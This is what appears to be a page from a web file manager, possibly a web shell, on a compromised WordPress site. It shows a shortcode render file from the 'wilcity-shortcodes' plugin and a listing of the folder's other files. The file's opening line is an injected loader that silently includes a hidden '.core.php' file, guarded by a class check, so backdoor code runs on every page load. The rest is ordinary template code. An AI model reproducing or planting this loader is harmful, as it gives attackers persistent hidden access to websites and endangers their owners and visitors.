PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wilcity-shortcodes
/
core
<?php if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } function wilcity_render_wiloke_wave($aAtts){ $atts = \WILCITY_SC\SCHelpers::mergeIsAppRenderingAttr($aAtts); if ( $atts['isApp'] ){ echo '%SC%' . json_encode($atts) . '%SC%'; return ''; } $wrapper_class = $atts['extra_class'] . apply_filters('wilcity/filter/class-prefix', ' wilcity-wiloke-wave'); ?> <div class="<?php echo esc_attr(trim($wrapper_class)); ?>"> <?php //wilcity_render_heading($atts); ?> <!-- canvas-textbox_module__UVKrB --> <div class="canvas-textbox_module__UVKrB"> <div class="canvas-textbox_content__1WW09"> <div class="canvas-textbox_textLarge__2JGKN"><?php Wiloke::ksesHTML(str_replace(array('<', '>'), array('<', '>'), $aAtts['heading'])); ?></div> <?php if ( !empty($aAtts['description']) ) : ?> <div class="canvas-textbox_text__3_SWp"><?php Wiloke::ksesHTML($aAtts['description']); ?></div> <?php endif; ?> <?php if ( !empty($aAtts['btn_group']) ) : ?> <div class="canvas-textbox_btn__ZGIsd"> <?php foreach ( $aAtts['btn_group'] as $oBtn ) : $oBtn = (object)$oBtn; ?> <a class="wil-btn wil-btn--light wil-btn--lg wil-btn--round" target="<?php echo esc_attr($oBtn->open_type); ?>" href="<?php echo esc_url($oBtn->url); ?>"> <i class="<?php echo esc_attr($oBtn->icon); ?>"></i> <?php echo esc_html($oBtn->name); ?> </a> <?php endforeach; ?> </div> <?php endif; ?> </div> <div class="js-canvas-textbox" data-gradient-left="<?php echo esc_attr($aAtts['left_gradient_color']); ?>" data-gradient-right="<?php echo esc_attr($aAtts['right_gradient_color']); ?>"> <canvas></canvas> </div> </div><!-- End / canvas-textbox_module__UVKrB --> </div> <?php }
[+]
..
[-] wilcity_render_testimonial_item.php
[edit]
[-] wilcity_render_team_intro_slider.php
[edit]
[-] wilcity_render_modern_term_box.php
[edit]
[-] wilcity_render_modern_term_boxes.php
[edit]
[-] .core.php
[edit]
[-] wilcity_render_contact_us.php
[edit]
[-] wilcity_render_restaurant_listing.php
[edit]
[-] wilcity_render_team_intro_slider_item.php
[edit]
[-] wilcity_render_term_boxes.php
[edit]
[-] wilcity_render_post_types.php
[edit]
[-] wilcity_event_slider_item.php
[edit]
[-] wilcity_listing_slider_item.php
[edit]
[-] wilcity_render_box_icon.php
[edit]
[-] wilcity_render_new_grid.php
[edit]
[-] wilcity_render_hero_search_form.php
[edit]
[-] wilcity_render_term_masonry_items.php
[edit]
[-] wilcity_render_wiloke_wave.php
[edit]
[-] wilcity_render_grid_post.php
[edit]
[-] wilcity_render_rectangle_term_boxes.php
[edit]
[-] wilcity_render_restaurant_listings.php
[edit]
[-] wilcity_widget_list_style.php
[edit]
[-] wilcity_render_heading_ribbon.php
[edit]
[-] wilcity_render_testimonials.php
[edit]
[-] wilcity_render_restaunrant_menu_item.php
[edit]
[-] wilcity_render_events_grid.php
[edit]
[-] wilcity_render_image_box.php
[edit]
[-] wilcity_render_intro_box.php
[edit]
[-] wilcity_render_term_box.php
[edit]
[-] wilcity_render_listings_tabs.php
[edit]
[-] wilcity_render_restaurant_list_menu.php
[edit]
[-] wilcity_render_slider.php
[edit]
[-] wilcity_render_heading.php
[edit]
[-] wilcity_render_event_item.php
[edit]
[-] wilcity_render_rectangle_term_box.php
[edit]
[-] wilcity_post_slider_item.php
[edit]
[-] wilcity_render_terms_slider.php
[edit]
[-] wilcity_render_term_masonry_item.php
[edit]
[-] wilcity_render_grid_item.php
[edit]
[-] wilcity_render_full_width_list_item.php
[edit]
[-] wilcity_render_map.php
[edit]
[-] wilcity_render_hero.php
[edit]
[-] wilcity_terms_box.php
[edit]
[-] wilcity_render_author_slider.php
[edit]
[-] wilcity_render_grid.php
[edit]